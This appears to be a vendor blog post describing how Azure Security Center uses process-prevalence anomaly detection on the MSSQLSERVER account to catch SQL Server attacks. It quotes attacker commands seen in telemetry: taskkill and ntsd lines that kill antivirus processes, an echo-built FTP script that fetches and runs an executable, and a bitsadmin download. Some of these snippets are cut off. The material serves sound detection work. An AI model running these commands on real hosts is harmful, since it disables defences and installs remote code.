Earlier this year, Greg Cottingham wrote a great article breaking down an example of an Azure Security Center detected attack against SQL Server. In this post, we'll go into more detail on the way that security center analyzes data at-scale to detect these types of attacks, and how the output from these approaches can be used to pivot to other intrusions that share some common techniques.
With attack techniques rapidly evolving, many organizations are struggling to keep pace. This is exacerbated by a scarcity of security talent, and companies can no longer rely solely on detections written by human beings. By baking the intuition of human security analysts inside algorithms, Azure Security Center can automatically adapt to changing attack patterns.
Let’s look at how security center uses this approach to detect attacks against SQL Server. By analyzing processes executed by the MSSQLSERVER account, we see it is very stable under normal circumstances – it performs a fixed set of actions, almost all the time. The stability of this account allows us to build a model that will detect anomalous activity that occurs when it is experiencing an attack.
Building a model
Before security center can construct a model of this data, it performs some pre-processing to collapse process executions that run out of similar directories. Otherwise, the model would see these as different processes. It uses a distance function over the process directory to cluster, and then aggregate prevalence where a process name is shared. An example of this process can be seen below.
This can be reduced to the single summarized state:
It also manipulates the data to capture hosted executions such as regsvr32.exe and rundll32.exe that may be common in themselves, but can be used to run other files. By treating the file that was run as an execution in its own right, insight is gained into any code that was run by this mechanism.
With this normalized data, the Azure Security Center detection engine can plot the prevalence of processes executed by MSSQLSERVER in a subscription. Due to the stability of this account, this simple approach produces a robust model of normal behavior by process name and location. A visualization of this model can be seen in the graph below.
When an attack surface like SQL Server is targeted, an attacker’s first few actions are highly constrained. They can try various tactics, which all leave a trail of process execution events. In the example below, we show the same model built by security center using data from a subscription at a time it experienced a SQL Server attack. This time, it finds anomalies in the tail of low prevalence executions that contain some interesting data.
taskkill /im 360rp.exe /f taskkill /im 360sd.exe /f taskkill /im 360rps.exe /f ntsd -c q -pn 360rp.exe ntsd -c q -pn 360sd.exe ntsd -c q -pn 360rps.exe
In the first phase, we see several attempts to disable the anti-virus engine running on the host. The first uses the built-in tool
taskkill to end the process. The second uses a debugger, ‘ntsd’ to attach to the process it wishes to disrupt with the –pn argument and executes the command ‘q’ once it has successfully attached to the target. The ‘q’ command causes the debugger to terminate the target application.
With the anti-virus engine disabled, the attacker is free to download and run its first stage from the internet. It does this in a couple of different ways:
The first is over the FTP protocol. We see the attacker use the echo command to write a series of FTP commands to a file:
echo open xxx.xxx.xxx.xxx>So.2 echo 111>>So.2 echo 000>>So.2 echo get Svn.exe >>So.2 echo bye
The commands are then executed:
The file is deleted, and the executable is run:
del So.2 Svn.exe
In case this method of downloading the executable fails, the attack falls back to a secondary mechanism of fetching the file, from the same address this time over HTTP:
Here we see the attacker downloading the executable file from the internet using the
Using machine learning, Azure Security Center alerts on anomalous activity like this – all without specialist knowledge or human intervention. Here is how one of these alerts looks inside Azure Security Center:
Mining the output
Although this approach is limited to detecting attacks in a very specific scenario, it also acts as a detection factory, automating the discovery of new techniques used by attackers.
Let’s look again at the
bitsadmin /transfer n c:\Users\Public\xxx.exe"
On close inspection, this looks like a general technique that attackers can use to execute a remote file using a built-in capability of the operating system, but it was surfaced to us by an algorithm rather than a security expert.
While the legitimate use of
bitsadmin is common, the remote location, job name and the destination directory of the executable are suspicious. This provides the basis for a new detection, specifically targeted at unusual
bitsadmin executions, independent of whether or not they are run by the MSSQLSERVER account.
bitsadmin and other alerts generated by this approach can be mined for suitability as standalone detection opportunities. They, in turn, alert customers to other attacks that occur on their subscriptions where some common techniques are shared by another attack vector.
By using Azure Security Center, customers with SQL Server deployments automatically benefit from this approach to detection. Because it is anomaly based, it adapts to changing tactics, alerting of new attacks without involvement from a human expert. The new techniques captured by this approach generate detection opportunities, that feedback into protecting all security center customers.
For more information on the types of attacks mentioned in this article and how to mitigate them, see the blog, "How Azure Security Center helps reveal a Cyberattack."
To learn more about detection in Azure Security Center, see the following: